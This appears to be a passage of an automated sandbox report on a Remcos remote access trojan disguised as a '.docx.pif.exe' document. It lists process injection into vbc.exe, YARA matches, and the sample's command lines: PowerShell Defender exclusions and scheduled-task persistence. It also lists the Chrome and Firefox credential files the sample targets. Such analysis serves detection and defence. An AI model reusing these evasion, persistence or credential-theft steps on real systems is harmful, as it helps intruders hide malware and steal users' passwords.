Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 478000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 479000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 51E1008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

15_2_004120F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00419627 mouse_event,

15_2_00419627

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior

Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerspirpc
Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr	Binary or memory string: [Program Manager]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00434C52 cpuid

15_2_00434C52

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: EnumSystemLocalesW,	15_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetLocaleInfoW,	15_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: EnumSystemLocalesW,	15_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetLocaleInfoW,	15_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetLocaleInfoA,	15_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: GetLocaleInfoW,	15_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: EnumSystemLocalesW,	15_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: EnumSystemLocalesW,	15_2_00451F9B

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Queries volume information: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Queries volume information: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0040B164 GetLocalTime,wsprintfW,

15_2_0040B164

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041B60D GetUserNameW,

15_2_0041B60D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

15_2_00449190

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

15_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		15_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: \key3.db		15_2_0040BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3			Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
